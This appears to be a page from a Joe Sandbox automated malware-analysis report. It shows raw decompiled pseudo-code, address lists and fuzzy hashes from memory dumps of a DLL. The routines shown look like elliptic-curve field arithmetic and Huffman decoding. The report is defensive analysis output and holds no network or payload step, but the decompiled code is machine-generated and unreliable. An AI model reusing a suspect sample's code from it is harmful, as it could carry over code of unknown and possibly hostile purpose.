				 *(_t659 + 0x3d) = _t456 >> 4;
				_t458 = __rdx[0xf] & 0x000000ff;
				 *(_t659 + 0x3c) = _t456 & 0xf;
				 *(_t659 + 0x3f) = _t458 >> 4;
				_t460 = __rdx[0x10] & 0x000000ff;
				 *(_t659 + 0x3e) = _t458 & 0xf;
				 *(_t659 + 0x41) = _t460 >> 4;
				_t462 = __rdx[0x11] & 0x000000ff;
				 *(_t659 + 0x40) = _t460 & 0xf;
				 *(_t659 + 0x43) = _t462 >> 4;
				_t464 = __rdx[0x12] & 0x000000ff;
				 *(_t659 + 0x42) = _t462 & 0xf;
				 *(_t659 + 0x45) = _t464 >> 4;
				_t466 = __rdx[0x13] & 0x000000ff;
				 *(_t659 + 0x44) = _t464 & 0xf;
				 *(_t659 + 0x47) = _t466 >> 4;
				_t468 = __rdx[0x14] & 0x000000ff;
				 *(_t659 + 0x46) = _t466 & 0xf;
				 *(_t659 + 0x49) = _t468 >> 4;
				_t470 = __rdx[0x15] & 0x000000ff;
				 *(_t659 + 0x48) = _t468 & 0xf;
				 *(_t659 + 0x4b) = _t470 >> 4;
				_t472 = __rdx[0x16] & 0x000000ff;
				 *(_t659 + 0x4a) = _t470 & 0xf;
				 *(_t659 + 0x4d) = _t472 >> 4;
				_t474 = __rdx[0x17] & 0x000000ff;
				 *(_t659 + 0x4c) = _t472 & 0xf;
				 *(_t659 + 0x4f) = _t474 >> 4;
				_t476 = __rdx[0x18] & 0x000000ff;
				 *(_t659 + 0x4e) = _t474 & 0xf;
				 *(_t659 + 0x51) = _t476 >> 4;
				_t478 = __rdx[0x19] & 0x000000ff;
				 *(_t659 + 0x50) = _t476 & 0xf;
				 *(_t659 + 0x53) = _t478 >> 4;
				_t480 = __rdx[0x1a] & 0x000000ff;
				 *(_t659 + 0x52) = _t478 & 0xf;
				 *(_t659 + 0x54) = _t480 & 0xf;
				 *(_t659 + 0x55) = _t480 >> 4;
				r8b = 0;
				_t482 = __rdx[0x1b] & 0x000000ff;
				 *(_t659 + 0x57) = _t482 >> 4;
				_t484 = __rdx[0x1c] & 0x000000ff;
				 *(_t659 + 0x56) = _t482 & 0xf;
				 *(_t659 + 0x59) = _t484 >> 4;
				_t486 = __rdx[0x1d] & 0x000000ff;
				 *(_t659 + 0x58) = _t484 & 0xf;
				 *(_t659 + 0x5b) = _t486 >> 4;
				_t488 = __rdx[0x1e] & 0x000000ff;
				 *(_t659 + 0x5a) = _t486 & 0xf;
				 *(_t659 + 0x5d) = _t488 >> 4;
				_t490 = __rdx[0x1f] & 0x000000ff;
				 *(_t659 + 0x5c) = _t488 & 0xf;
				 *(_t659 + 0x5e) = _t490 & 0xf;
				r9d = 0;
				 *(_t659 + 0x5f) = _t490 >> 4;
				asm("o16 nop [eax+eax]");
				r8b = r8b +  *(_t659 + __r9 + 0x20);
				_t493 = __r8 + 8 >> 4;
				r8b = r8b - ((_t493 & 0x000000ff) << 4);
				 *(_t659 + __r9 + 0x20) = r8b;
				_t533 = __rcx + 8 >> 4;
				 *((char*)(_t659 + __r9 + 0x21)) = _t493 +  *((intOrPtr*)(_t659 + __r9 + 0x21)) - ((_t533 & 0x000000ff) << 4);
				_t497 =  &(__rdx[8]) >> 4;
				 *((char*)(_t659 + __r9 + 0x22)) = _t533 +  *((intOrPtr*)(_t659 + __r9 + 0x22)) - ((_t497 & 0x000000ff) << 4);
				_t537 = __rcx + 8 >> 4;
				 *((char*)(_t659 + __r9 + 0x23)) = _t497 +  *((intOrPtr*)(_t659 + __r9 + 0x23)) - ((_t537 & 0x000000ff) << 4);
				_t501 =  &(__rdx[8]) >> 4;
				 *((char*)(_t659 + __r9 + 0x24)) = _t537 +  *((intOrPtr*)(_t659 + __r9 + 0x24)) - ((_t501 & 0x000000ff) << 4);
				_t541 = __rcx + 8 >> 4;
				 *((char*)(_t659 + __r9 + 0x25)) = _t501 +  *((intOrPtr*)(_t659 + __r9 + 0x25)) - ((_t541 & 0x000000ff) << 4);
				_t505 =  &(__rdx[8]) >> 4;
				 *((char*)(_t659 + __r9 + 0x26)) = _t541 +  *((intOrPtr*)(_t659 + __r9 + 0x26)) - ((_t505 & 0x000000ff) << 4);
				_t545 = __rcx + 8 >> 4;
				 *((char*)(_t659 + __r9 + 0x27)) = _t505 +  *((intOrPtr*)(_t659 + __r9 + 0x27)) - ((_t545 & 0x000000ff) << 4);
				_t509 =  &(__rdx[8]) >> 4;
				 *((char*)(_t659 + __r9 + 0x28)) = _t545 +  *((intOrPtr*)(_t659 + __r9 + 0x28)) - ((_t509 & 0x000000ff) << 4);
				_t549 = __rcx + 8 >> 4;
				 *((char*)(_t659 + __r9 + 0x29)) = _t509 +  *((intOrPtr*)(_t659 + __r9 + 0x29)) - ((_t549 & 0x000000ff) << 4);
				_t513 =  &(__rdx[8]) >> 4;
				 *((char*)(_t659 + __r9 + 0x2a)) = _t549 +  *((intOrPtr*)(_t659 + __r9 + 0x2a)) - ((_t513 & 0x000000ff) << 4);
				_t553 = __rcx + 8 >> 4;
				 *((char*)(_t659 + __r9 + 0x2b)) = _t513 +  *((intOrPtr*)(_t659 + __r9 + 0x2b)) - ((_t553 & 0x000000ff) << 4);
				_t517 =  &(__rdx[8]) >> 4;
				 *((char*)(_t659 + __r9 + 0x2c)) = _t553 +  *((intOrPtr*)(_t659 + __r9 + 0x2c)) - ((_t517 & 0x000000ff) << 4);
				_t557 = __rcx + 8 >> 4;
				 *((char*)(_t659 + __r9 + 0x2d)) = _t517 +  *((intOrPtr*)(_t659 + __r9 + 0x2d)) - ((_t557 & 0x000000ff) << 4);
				_t521 =  &(__rdx[8]) >> 4;
				 *((char*)(_t659 + __r9 + 0x2e)) = _t557 +  *((intOrPtr*)(_t659 + __r9 + 0x2e)) - ((_t521 & 0x000000ff) << 4);
				_t561 = __rcx + 8 >> 4;
				 *((char*)(_t659 + __r9 + 0x2f)) = _t521 +  *((intOrPtr*)(_t659 + __r9 + 0x2f)) - ((_t561 & 0x000000ff) << 4);
				_t525 =  &(__rdx[8]) >> 4;
				 *((char*)(_t659 + __r9 + 0x30)) = _t561 +  *((intOrPtr*)(_t659 + __r9 + 0x30)) - ((_t525 & 0x000000ff) << 4);
				_t565 = __rcx + 8 >> 4;
				 *((char*)(_t659 + __r9 + 0x31)) = _t525 +  *((intOrPtr*)(_t659 + __r9 + 0x31)) - ((_t565 & 0x000000ff) << 4);
				_t529 =  &(__rdx[8]) >> 4;
				 *((char*)(_t659 + __r9 + 0x32)) = _t565 +  *((intOrPtr*)(_t659 + __r9 + 0x32)) - ((_t529 & 0x000000ff) << 4);
				_t569 = __rcx + 8 >> 4;
				_t531 = _t529 +  *((intOrPtr*)(_t659 + __r9 + 0x33)) - ((_t569 & 0x000000ff) << 4);
				 *((char*)(_t659 + __r9 + 0x33)) = _t529 +  *((intOrPtr*)(_t659 + __r9 + 0x33)) - ((_t569 & 0x000000ff) << 4);
				r8d =  &(__rdx[8]);
				r8b = r8b >> 4;
				 *((char*)(_t659 + __r9 + 0x34)) = _t569 +  *((intOrPtr*)(_t659 + __r9 + 0x34)) - ((r8b & 0xffffffff) << 4);
				_t686 = __r9 + 0x15;
				if (__r9 + 0x15 - 0x3f < 0) goto 0xf30e9010;
				 *(_t659 + 0x5f) =  *(_t659 + 0x5f) + r8b;
				asm("xorps xmm0, xmm0");
				asm("movups [ebx], xmm0");
				asm("movups [ebx+0x10], xmm0");
				 *(__rcx + 0x20) = _t585;
				asm("movups [ebx+0x28], xmm0");
				asm("movups [ebx+0x38], xmm0");
				 *(__rcx + 0x48) = _t585;
				 *((intOrPtr*)(__rcx + 0x28)) = 1;
				asm("movups [ebx+0x50], xmm0");
				asm("movups [ebx+0x60], xmm0");
				 *(__rcx + 0x70) = _t585;
				 *((intOrPtr*)(__rcx + 0x50)) = 1;
				asm("movups [ebx+0x78], xmm0");
				asm("movups [ebx+0x88], xmm0");
				 *(__rcx + 0x98) = _t585;
				asm("o16 nop [eax+eax]");
				r8d =  *(_t659 + 0x21) & 0x000000ff;
				E000007FE7FEF30EDEF0(1 >> 1, __r9 + 0x15 - 0x3f, __rcx, _t658 - 0x110 + 0x80, __rdi, __rsi);
				E000007FE7FEF30ED440(__r9 + 0x15 - 0x3f, _t585, __rcx, _t659 + 0x60, __rcx, _t649, _t653, _t658 - 0x110, _t656 + 0x80, __r9 + 0x15, _t687, _t688, _t698, _t696);
				E000007FE7FEF30EBAF0(_t585, __rcx, _t659 + 0x60, _t656 - 0x28, __r9 + 0x15, _t687, _t688, _t694, _t690);
				E000007FE7FEF30EBAF0(_t585, __rcx + 0x28, _t656 - 0x78, _t656 - 0x50, __r9 + 0x15, _t687, _t688);
				E000007FE7FEF30EBAF0(_t585, __rcx + 0x50, _t656 - 0x50, _t656 - 0x28, __r9 + 0x15, _t687, _t688);
				E000007FE7FEF30EBAF0(_t585, __rcx + 0x78, _t659 + 0x60, _t656 - 0x78, _t686, _t687, _t688);
				if (3 - 0x40 < 0) goto 0xf30e9270;
				E000007FE7FEF30EDCC0(3 - 0x40, _t659 + 0x60, __rcx);
				E000007FE7FEF30EBAF0(_t585, _t656, _t659 + 0x60, _t656 - 0x28, _t686, _t687, _t688);
				E000007FE7FEF30EBAF0(_t585, _t656 + 0x28, _t656 - 0x78, _t656 - 0x50, _t686, _t687, _t688);
				E000007FE7FEF30EBAF0(_t585, _t656 + 0x50, _t656 - 0x50, _t656 - 0x28, _t686, _t687, _t688);
				E000007FE7FEF30EDA30(_t427, 3 - 0x40, _t585, __rcx, _t659 + 0x60, _t656, _t649, _t653, _t656 - 0x28, _t687, _t688);
				E000007FE7FEF30EBAF0(_t585, _t656, _t659 + 0x60, _t656 - 0x28, _t686, _t687, _t688);
				E000007FE7FEF30EBAF0(_t585, _t656 + 0x28, _t656 - 0x78, _t656 - 0x50, _t686, _t687, _t688);
				E000007FE7FEF30EBAF0(_t585, _t656 + 0x50, _t656 - 0x50, _t656 - 0x28, _t686, _t687, _t688);
				E000007FE7FEF30EDA30(_t427, 3 - 0x40, _t585, _t587, _t659 + 0x60, _t656, _t649, _t653, _t656 - 0x28, _t687, _t688);
				E000007FE7FEF30EBAF0(_t585, _t656, _t659 + 0x60, _t656 - 0x28, _t686, _t687, _t688);
				E000007FE7FEF30EBAF0(_t585, _t656 + 0x28, _t656 - 0x78, _t656 - 0x50, _t686, _t687, _t688);
				E000007FE7FEF30EBAF0(_t585, _t656 + 0x50, _t656 - 0x50, _t656 - 0x28, _t686, _t687, _t688);
				E000007FE7FEF30EDA30(_t427, 3 - 0x40, _t585, _t587, _t659 + 0x60, _t656, _t649, _t653, _t656 - 0x28, _t687, _t688);
				E000007FE7FEF30EBAF0(_t585, _t587, _t659 + 0x60, _t656 - 0x28, _t686, _t687, _t688);
				E000007FE7FEF30EBAF0(_t585, _t587 + 0x28, _t656 - 0x78, _t656 - 0x50, _t686, _t687, _t688);
				E000007FE7FEF30EBAF0(_t585, _t587 + 0x50, _t656 - 0x50, _t656 - 0x28, _t686, _t687, _t688);
				E000007FE7FEF30EBAF0(_t585, _t587 + 0x78, _t659 + 0x60, _t656 - 0x78, _t686, _t687, _t688);
				r8d =  *(_t659 + 0x20) & 0x000000ff;
				E000007FE7FEF30EDEF0(0 >> 1, 3 - 0x40, _t587, _t656 + 0x80, _t659 + 0x20, _t653);
				E000007FE7FEF30ED440(3 - 0x40, _t585, _t587, _t659 + 0x60, _t587, _t659 + 0x20, _t653, _t656, _t656 + 0x80, _t686, _t687, _t688);
				E000007FE7FEF30EBAF0(_t585, _t587, _t659 + 0x60, _t656 - 0x28, _t686, _t687, _t688);
				E000007FE7FEF30EBAF0(_t585, _t587 + 0x28, _t656 - 0x78, _t656 - 0x50, _t686, _t687, _t688);
				E000007FE7FEF30EBAF0(_t585, _t587 + 0x50, _t656 - 0x50, _t656 - 0x28, _t686, _t687, _t688);
				_t425 = E000007FE7FEF30EBAF0(_t585, _t587 + 0x78, _t659 + 0x60, _t656 - 0x78, _t686, _t687, _t688);
				if (2 - 0x40 < 0) goto 0xf30e9410;
				return E000007FE7FEF30F1360(_t425, _t531,  *(_t656 + 0x100) ^ _t659);
			}

0x7fef30e8d40
0x7fef30e8d40
0x7fef30e8d40
0x7fef30e8d45
0x7fef30e8d4a
0x7fef30e8d58
0x7fef30e8d60
0x7fef30e8d67
0x7fef30e8d6e
0x7fef30e8d71
0x7fef30e8d78
0x7fef30e8d7b
0x7fef30e8d86
0x7fef30e8d8a
0x7fef30e8d8e
0x7fef30e8d9a
0x7fef30e8d9e
0x7fef30e8da2
0x7fef30e8dae
0x7fef30e8db2
0x7fef30e8db6
0x7fef30e8dc2
0x7fef30e8dc6
0x7fef30e8dca
0x7fef30e8dd6
0x7fef30e8dda
0x7fef30e8dde
0x7fef30e8dea
0x7fef30e8dee
0x7fef30e8df2
0x7fef30e8dfe
0x7fef30e8e02
0x7fef30e8e06
0x7fef30e8e12
0x7fef30e8e16
0x7fef30e8e1a
0x7fef30e8e26
0x7fef30e8e2a
0x7fef30e8e2e
0x7fef30e8e3a
0x7fef30e8e3e
0x7fef30e8e42
0x7fef30e8e4e
0x7fef30e8e52
0x7fef30e8e56
0x7fef30e8e62
0x7fef30e8e66
0x7fef30e8e6a
0x7fef30e8e76
0x7fef30e8e7a
0x7fef30e8e7e
0x7fef30e8e8a
0x7fef30e8e8e
0x7fef30e8e92
0x7fef30e8e9e
0x7fef30e8ea2
0x7fef30e8ea6
0x7fef30e8eb2
0x7fef30e8eb6
0x7fef30e8eba
0x7fef30e8ec6
0x7fef30e8eca
0x7fef30e8ece
0x7fef30e8eda
0x7fef30e8ede
0x7fef30e8ee2
0x7fef30e8eee
0x7fef30e8ef2
0x7fef30e8ef6
0x7fef30e8f02
0x7fef30e8f06
0x7fef30e8f0a
0x7fef30e8f16
0x7fef30e8f1a
0x7fef30e8f1e
0x7fef30e8f2a
0x7fef30e8f2e
0x7fef30e8f32
0x7fef30e8f3e
0x7fef30e8f42
0x7fef30e8f46
0x7fef30e8f52
0x7fef30e8f56
0x7fef30e8f5a
0x7fef30e8f66
0x7fef30e8f6a
0x7fef30e8f6e
0x7fef30e8f7a
0x7fef30e8f7e
0x7fef30e8f82
0x7fef30e8f8b
0x7fef30e8f92
0x7fef30e8f96
0x7fef30e8f99
0x7fef30e8fa5
0x7fef30e8fa9
0x7fef30e8fad
0x7fef30e8fb9
0x7fef30e8fbd
0x7fef30e8fc1
0x7fef30e8fcd
0x7fef30e8fd1
0x7fef30e8fd5
0x7fef30e8fe1
0x7fef30e8fe5
0x7fef30e8fe9
0x7fef30e8ff7
0x7fef30e8ffb
0x7fef30e8ffe
0x7fef30e9006
0x7fef30e9010
0x7fef30e9019
0x7fef30e9027
0x7fef30e902a
0x7fef30e9032
0x7fef30e9042
0x7fef30e904a
0x7fef30e905a
0x7fef30e9062
0x7fef30e9072
0x7fef30e907a
0x7fef30e908a
0x7fef30e9092
0x7fef30e90a2
0x7fef30e90aa
0x7fef30e90ba
0x7fef30e90c2
0x7fef30e90d2
0x7fef30e90da
0x7fef30e90ea
0x7fef30e90f2
0x7fef30e9102
0x7fef30e910a
0x7fef30e911a
0x7fef30e9122
0x7fef30e9132
0x7fef30e913a
0x7fef30e914a
0x7fef30e9152
0x7fef30e9162
0x7fef30e916a
0x7fef30e917a
0x7fef30e9182
0x7fef30e9192
0x7fef30e919a
0x7fef30e91aa
0x7fef30e91b2
0x7fef30e91c2
0x7fef30e91ca
0x7fef30e91da
0x7fef30e91e2
0x7fef30e91f0
0x7fef30e91f2
0x7fef30e91f7
0x7fef30e91fb
0x7fef30e9208
0x7fef30e920d
0x7fef30e9215
0x7fef30e921b
0x7fef30e9225
0x7fef30e922a
0x7fef30e9232
0x7fef30e9236
0x7fef30e923a
0x7fef30e923e
0x7fef30e9242
0x7fef30e9246
0x7fef30e9249
0x7fef30e924d
0x7fef30e9251
0x7fef30e9255
0x7fef30e9258
0x7fef30e925c
0x7fef30e9263
0x7fef30e926a
0x7fef30e9270
0x7fef30e9280
0x7fef30e9294
0x7fef30e92a5
0x7fef30e92b6
0x7fef30e92c7
0x7fef30e92d9
0x7fef30e92e9
0x7fef30e92f3
0x7fef30e9305
0x7fef30e9316
0x7fef30e9327
0x7fef30e9335
0x7fef30e9347
0x7fef30e9358
0x7fef30e9369
0x7fef30e9377
0x7fef30e9389
0x7fef30e939a
0x7fef30e93ab
0x7fef30e93b9
0x7fef30e93ca
0x7fef30e93db
0x7fef30e93ec
0x7fef30e93fe
0x7fef30e9410
0x7fef30e941f
0x7fef30e9433
0x7fef30e9444
0x7fef30e9455
0x7fef30e9466
0x7fef30e9478
0x7fef30e9487
0x7fef30e94b8

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e8eceedef6fa98abcef12e8f9245f81a35e417a467c3bc42d7bb0f5fda33283
Instruction ID: 5f9875eddfa3a11d5d4ae826d4960573e39d89aa261577eba65ea116f50e886b
Opcode Fuzzy Hash: 1e8eceedef6fa98abcef12e8f9245f81a35e417a467c3bc42d7bb0f5fda33283
Instruction Fuzzy Hash: B832B5A312C6D18EDB01DB3AD0512FEBFA1E3A5358F480146E7C90B99BC56CC29DDB24

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30EBAF0 Relevance: .4, Instructions: 443
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF30EBAF0(signed int __rax, signed int __rcx, signed int __rdx, signed int __r8, signed int __r9, signed int __r10, signed int __r11, void* _a8, signed int _a16, signed int _a24, signed int _a32) {
				long long _v88;
				long long _v96;
				unsigned int _v104;
				signed long long _v112;
				signed int _v120;
				signed int _v128;
				signed int _v136;
				unsigned int _v144;
				signed int _v152;
				long long _v160;
				signed int _v168;
				signed int _v176;
				signed int _v184;
				signed int _v192;
				long long _v200;
				signed int _v208;
				signed int _v216;
				signed int _v224;
				signed int _v232;
				signed int _v240;
				signed int _t210;
				signed int _t212;
				unsigned int _t219;
				signed long long _t231;
				signed long long _t232;
				signed long long _t233;
				signed long long _t234;
				signed long long _t239;
				signed long long _t417;
				signed long long _t431;
				signed long long _t452;
				signed int* _t455;
				signed long long _t456;
				signed long long _t457;
				void* _t460;
				signed int* _t461;
				unsigned int _t466;
				signed long long _t473;
				signed long long _t484;
				signed long long _t539;
				signed long long _t540;
				signed long long _t553;
				signed long long _t566;

				_a8 = __rcx;
				_t461 = _t460 - 0xb8;
				_v208 = __rax;
				r13d =  *__rdx;
				_a24 = __rax;
				r10d =  *(__r8 + 0xc) * 0x26;
				_v184 = __rax;
				_a16 = __rax;
				_v152 = __rax;
				_a32 = __rax;
				r9d =  *(__r8 + 8) * 0x13;
				_v216 = __rax;
				_v232 = __rax;
				r15d =  *(__r8 + 0x1c) * 0x26;
				_v128 = __rax;
				_v224 = __rax;
				r11d =  *(__r8 + 0x10) * 0x13;
				_v200 = __rax;
				 *_t461 = __rax;
				r14d =  *(__r8 + 0x24) * 0x26;
				_v168 = __rax;
				_v160 = __rax;
				_v240 = __rax;
				r12d =  *(__r8 + 0x20) * 0x13;
				_v96 = __rax;
				r8d =  *(__r8 + 4) * 0x26;
				_v176 = __rcx;
				_v112 = _t553;
				_v192 = _t457;
				_v120 = _t540;
				_t231 = __rax * _t540;
				_v136 = _t456;
				_t232 = _t231 * _t539;
				_t431 = __rcx * _t417;
				_t466 = __r8 * __rax + _t231 + _t232;
				_t233 = _t232 * _t452;
				_v144 = _t466;
				_t234 = _t233 * _t553;
				_t235 = _t234 * __r11;
				_t239 = _a16 * __r10;
				_t473 = _t466 + _t233 + _t234 + _t234 * __r11 + _t235 * _t566 + _t235 * _t566 * __r9 + _t431 + _t239;
				_v144 = _t473;
				r8d = _v184 * 0x13;
				_t484 = _t473 * _v232 + _t239 * _v208 + _v176 * _t457 + _v240 * __rdx +  *_t461 * _t431 +  *_t461 * _t431 * _v192 + _v224 * _t539 + _a32 * _t452 + _a16 * __r11 + _a24 * __r9 + (_v144 >> 0x1a);
				_v104 = _t484;
				r8d = r13d;
				_v88 = _t484 * _v216 + _v192 * _t456 + _v136 * _v176 + _v240 * _t539 +  *_t461 * _t452 + _v224 * _t553 + _v232 * __r11 + _a32 * _t566 + _a16 * _t417 + _a24 * __r10 + (_v104 >> 0x19);
				r9d = r9d + r9d;
				r9d = r9d & 0x03ffffff;
				_v168 = _v168 * _v120;
				_t455 = _a8;
				r9d = r9d & 0x03ffffff;
				_t219 = _v152 * 0x13 + _v152 * 0x13 + ( *__r8 & 0x01ffffff);
				 *_t455 = r9d;
				_t210 = _t219 & 0x01ffffff;
				_t455[1] = _t210;
				_t212 = (_t210 & 0x03ffffff) + (_t219 >> 0x19);
				r13d = r13d & 0x01ffffff;
				r14d = r14d & 0x03ffffff;
				_t455[2] = _t212;
				r11d = r11d & 0x01ffffff;
				_t455[3] = r13d;
				r10d = r10d & 0x03ffffff;
				_t455[4] = r14d;
				r8d = r8d & 0x01ffffff;
				_t455[5] = r11d;
				_t455[6] = r10d;
				_t455[7] = r8d;
				_t455[9] =  *(__r8 + 0x14) * 0x00000026 & 0x01ffffff;
				_t455[8] = _v128 * 0x00000013 + _v128 * 0x00000013 & 0x03ffffff;
				return _t212;
			}

0x7fef30ebaf0
0x7fef30ebb01
0x7fef30ebb0f
0x7fef30ebb1a
0x7fef30ebb1d
0x7fef30ebb29
0x7fef30ebb30
0x7fef30ebb38
0x7fef30ebb47
0x7fef30ebb4f
0x7fef30ebb5b
0x7fef30ebb5f
0x7fef30ebb67
0x7fef30ebb70
0x7fef30ebb74
0x7fef30ebb7c
0x7fef30ebb85
0x7fef30ebb89
0x7fef30ebb91
0x7fef30ebb99
0x7fef30ebb9d
0x7fef30ebba9
0x7fef30ebbb1
0x7fef30ebbba
0x7fef30ebbbe
0x7fef30ebbca
0x7fef30ebbd1
0x7fef30ebbd6
0x7fef30ebbde
0x7fef30ebbe9
0x7fef30ebbf1
0x7fef30ebbf5
0x7fef30ebc02
0x7fef30ebc06
0x7fef30ebc0a
0x7fef30ebc10
0x7fef30ebc14
0x7fef30ebc1e
0x7fef30ebc28
0x7fef30ebc4b
0x7fef30ebc52
0x7fef30ebc6d
0x7fef30ebc72
0x7fef30ebcf1
0x7fef30ebcf9
0x7fef30ebd01
0x7fef30ebdab
0x7fef30ebe36
0x7fef30ec137
0x7fef30ec151
0x7fef30ec188
0x7fef30ec1e2
0x7fef30ec1ed
0x7fef30ec1ef
0x7fef30ec1f4
0x7fef30ec1f9
0x7fef30ec20c
0x7fef30ec20e
0x7fef30ec215
0x7fef30ec21c
0x7fef30ec21f
0x7fef30ec226
0x7fef30ec22a
0x7fef30ec231
0x7fef30ec235
0x7fef30ec23c
0x7fef30ec246
0x7fef30ec250
0x7fef30ec254
0x7fef30ec257
0x7fef30ec26d

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19228b06b62d54997f199f6147d1ed45dc3c9f7a26cb5f5f575a2f20e6575cc2
Instruction ID: 4c2f50800965ec06ae3160081cb4f0cf4eb514c90df0429ad2e277b942213a77
Opcode Fuzzy Hash: 19228b06b62d54997f199f6147d1ed45dc3c9f7a26cb5f5f575a2f20e6575cc2
Instruction Fuzzy Hash: AD02DD73705B9886CA98CB0DF981689F7A4F7E8784F055126A7CC87FA5EE3CD5508B04

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF305FFC7 Relevance: .4, Instructions: 437
COMMONCrypto

Download Yara Rule

C-Code - Quality: 41%

			E000007FE7FEF305FFC7(void* __edx, signed int __rdi, void* __r8, void* __r10, void* __r11, void* __r12, long long __r13, void* __r14, void* __r15) {
				signed int _t391;
				signed int _t392;
				signed char _t393;
				signed char _t400;
				signed int _t408;
				signed int _t411;
				signed int _t414;
				unsigned int _t419;
				signed int _t420;
				short _t422;
				signed int _t436;
				signed short _t438;
				signed int _t439;
				signed int _t441;
				signed int _t449;
				signed short _t451;
				signed char _t460;
				signed int _t466;
				signed int _t469;
				unsigned int _t473;
				signed int _t502;
				signed int _t505;
				signed char _t506;
				signed int _t515;
				unsigned int _t524;
				signed int _t525;
				short _t527;
				signed char _t542;
				signed char _t544;
				signed int _t548;
				signed int _t549;
				signed char _t551;
				signed char _t557;
				signed int _t561;
				signed char _t565;
				signed int _t568;
				signed char _t587;
				unsigned int _t594;
				signed char _t596;
				signed int _t606;
				signed int _t612;
				signed int _t625;
				signed int _t626;
				signed int _t632;
				signed short _t635;
				signed int _t640;
				signed int _t641;
				signed short _t644;
				void* _t648;
				signed int _t651;
				signed int _t657;
				signed int _t660;
				signed int _t663;
				signed char _t665;
				signed int _t682;
				signed int _t684;
				signed int _t708;
				signed int _t711;
				void* _t734;
				signed int _t744;
				void* _t746;
				void* _t775;
				short _t783;
				void* _t788;
				signed int _t816;
				signed int _t817;
				void* _t821;
				void* _t824;
				void* _t826;
				signed int _t834;
				signed long long _t839;
				signed long long _t843;
				signed long long _t844;
				signed long long _t850;
				signed long long _t851;
				long long _t867;
				signed int _t876;
				signed long long _t877;
				signed long long _t878;
				signed long long _t882;
				signed long long _t883;
				signed long long _t884;
				signed long long _t885;
				signed long long _t886;
				signed long long _t887;
				signed long long _t888;
				signed long long _t890;
				void* _t891;
				long long* _t898;
				void* _t900;
				long long _t901;
				signed long long _t903;
				signed long long _t907;
				signed long long _t908;
				signed long long _t917;
				intOrPtr _t925;
				void* _t927;
				long long _t930;
				signed long long _t931;
				intOrPtr _t932;
				signed long long _t934;
				signed long long _t939;
				unsigned long long _t940;
				signed long long _t948;
				unsigned long long _t951;
				unsigned long long _t952;
				intOrPtr _t961;
				signed long long _t966;
				unsigned long long _t968;
				signed long long _t975;
				signed long long _t976;
				signed long long _t980;
				signed long long _t984;
				intOrPtr _t986;
				void* _t988;
				signed long long _t997;
				long long _t1001;
				void* _t1002;
				signed long long _t1005;
				signed char* _t1010;
				signed long long _t1014;
				signed long long _t1015;
				signed long long _t1016;
				signed long long _t1018;
				void* _t1023;
				signed long long _t1034;
				void* _t1036;
				long long _t1039;
				void* _t1043;
				intOrPtr _t1046;
				void* _t1048;
				intOrPtr _t1055;
				intOrPtr _t1058;
				long long _t1060;
				signed char* _t1063;
				intOrPtr _t1066;
				intOrPtr _t1067;
				intOrPtr _t1068;
				intOrPtr _t1070;
				signed long long _t1071;
				long long _t1076;
				signed char* _t1079;
				long long _t1087;
				signed char* _t1090;
				void* _t1097;
				void* _t1100;
				void* _t1101;
				void* _t1105;
				void* _t1106;
				signed int* _t1107;
				signed long long _t1113;

				_t391 =  *(_t1036 + 0x38);
				if (_t391 - 0xe > 0) goto 0xf30600a1;
				_t917 = __r15 - __r14;
				if (_t917 - 1 > 0) goto 0xf3060085;
				_t524 =  *((short*)(__r10 + 0xddc + _t917 * 2));
				if (_t524 < 0) goto 0xf3060019;
				if ((_t524 & 0x0000ffff) - 0x200 < 0) goto 0xf3060056;
				_t525 = _t524 >> 9;
				if (_t391 - _t525 < 0) goto 0xf3060056;
				goto 0xf30600a1;
				if (_t391 - 0xb < 0) goto 0xf3060056;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t525 - 0x23f > 0) goto 0xf30611b9;
				_t527 =  *((short*)(__r10 + 0x15dc + _t917 * 2));
				if (_t527 >= 0) goto 0xf3060051;
				if (_t391 - 0xc >= 0) goto 0xf3060023;
				if (_t527 >= 0) goto 0xf30600a1;
				if (__r14 == __r15) goto 0xf3060156;
				_t1015 = _t1014 << _t391;
				_t939 =  *(_t1036 + 0x30) | _t1015;
				 *(_t1036 + 0x30) = _t939;
				_t392 = _t391 + 8;
				 *(_t1036 + 0x38) = _t392;
				if (_t392 - 0xe <= 0) goto 0xf305ffed;
				goto 0xf30600a1;
				_t1016 = _t1015 << _t392;
				_t940 = _t939 | _t1016;
				 *(_t1036 + 0x30) = _t940;
				_t393 = _t392 + 0x10;
				 *(_t1036 + 0x38) = _t393;
				_t632 =  *((short*)(__r10 + 0xddc + _t917 * 2));
				if (_t632 < 0) goto 0xf30600c3;
				goto 0xf30600ef;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t632 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t635 =  *((short*)(__r10 + 0x15dc + __rdi * 2));
				if (_t635 < 0) goto 0xf30600c8;
